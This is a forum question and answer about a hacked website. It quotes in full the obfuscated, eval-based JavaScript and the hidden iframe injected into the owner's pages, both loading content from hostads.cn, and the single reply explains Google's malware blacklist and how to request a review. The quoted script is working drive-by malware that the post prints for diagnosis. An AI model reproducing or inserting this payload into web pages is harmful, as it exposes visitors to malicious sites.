CODEWITHSUNDEEP
javascripthtmlmalware
Matthias
Matthias

Reputation: 13434

Malicious javascript injection (Hostads.cn)

It seems that my website has been hacked, or an exploit was found or something so now everytime I load certain pages the following javascript and iframe get injected:

<script language="JavaScript" type="text/javascript">
B76197C940748B="pars";B76197C940748B+="eIn";B76197C940748B+="t";DCEC79103="St";DCEC79103+="ring.";DCEC79103+="fr";DCEC79103+="omC";DCEC79103+="harCo";DCEC79103+="de";function E0D7700E45C574E(A911795){var B3593798FBC66C=370;B3593798FBC66C=B3593798FBC66C-354;D086A805=eval(B76197C940748B+"(A911795,B3593798FBC66C)");return(D086A805);}function A41D3C153B9E8(E02A0){var D49C4143=940;D49C4143=D49C4143-938;var FB8E017784670AD="";for(E1709AB22C52CD=0;E1709AB22C52CD<E02A0.length;E1709AB22C52CD+=D49C4143){FB8E017784670AD+=( eval(DCEC79103+"(E0D7700E45C574E(E02A0.substr(E1709AB22C52CD,D49C4143)))"));}eval(FB8E017784670AD);}A41D3C153B9E8("69662028646F63756D656E742E636F6F6B69652E73656172636828227574626F3D382229203D3D202D3129207B0A7463707A3D646F63756D656E742E676574456C656D656E7442794964282771757A676327293B6966287463707A3D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D71757A6763207372633D687474703A2F2F686F73746164732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D20227574626F3D383B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");
</script>

<iframe id="quzgc" src="http://hostads.cn" style="display:none"></iframe>

I've updated all my passwords (of my control panel, database, ftp,... everything) and removed the malicious code on all of my pages, php files, javascript files etc... I also fixed the permissions of all my files and folders to 755. (The infected pages were set to 777).

The problem seems resolved in Internet Explorer, Firefox, Opera and Safari. Everything works fine there, and no malicious code is inserted anymore. However, when I surf to my website with Google Chrome, I get the famous "Warning: Malware detected" page telling me google has found content of "hostads.cn", a know malicious website. Then, when I look into the source code I can indeed see that certain piece of javascript and iframe in my code.

I tried debugging my website, going over the code step by step to check where or what might be injecting the code, but I really can't find anything. And all the other browsers don't seem to suffer from it either.

Another oddity: When I "let" my pages get infected: i.e: I ignore the warning from Chrome and continue to the webpage I can indeed see the malicious code in my source. But when I download that certain page with FTP, everything looks perfectly fine...

So why is this malicious code inserted in Google Chrome alone, but not in a persistent way? And more importantly: What can I do against it?

Thanks.

Upvotes: 1

Views: 525

Answers (1)

James
James

Reputation: 117

Google works off a blacklist. You need to let Google know via Google Webmasters Tools that you have fixed it. I think you have removed the offending code from the site but you are still on the blacklist.

Site Health

https://support.google.com/webmasters/bin/answer.py?hl=en&answer=1624972

Request a malware review

https://support.google.com/webmasters/bin/answer.py?hl=en&answer=168328&ctx=cb&src=cb&cbid=15vfwobwt144o&cbrank=1

Upvotes: 3

Related Questions